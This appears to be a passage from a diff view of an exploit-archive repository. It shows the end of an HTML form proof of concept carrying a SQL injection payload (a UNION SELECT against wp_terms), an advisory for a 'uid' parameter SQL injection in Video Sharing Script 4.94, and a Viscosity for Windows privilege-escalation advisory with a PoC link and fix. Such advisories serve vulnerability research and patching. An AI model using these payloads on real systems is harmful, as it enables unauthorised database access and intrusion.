<input type="text" name="filetitle" value="0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=1">
<input type="text" name="temp_sel_key" value="select_temp">
<input type="submit" name="">
</form>
3 - Timeline:
- 12/01/2016 Discovered
- 13/12/2016 Vendor not finded
12/01/2016 Discovered
13/12/2016 Vendor not finded

18
platforms/php/webapps/41204.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Video Sharing Script 4.94 - 'uid' Parameter SQL Injection
# Google Dork: N/A
# Date: 30.01.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://itechscripts.com/video-sharing-script/
# Demo: http://video-sharing.itechscripts.com/
# Version: 4.94
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/channels.php?uid=[SQL]
# E.t.c
# # # # #

View file

@ -0,0 +1,23 @@
# Exploit Title: Viscosity for Windows 1.6.7 Privilege Escalation
# Date: 31.01.2017
# Software Link: https://www.sparklabs.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: local
1. Description
It is possible to execute openvpn with custom dll as SYSTEM using ViscosityService because path is not correctly validated.
https://security.szurek.pl/viscosity-for-windows-167-privilege-escalation.html
2. Proof of Concept
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41207.zip
3. Solution
Update to version 1.6.8
https://www.sparklabs.com/blog/viscosity-for-mac-windows-version-1-6-8/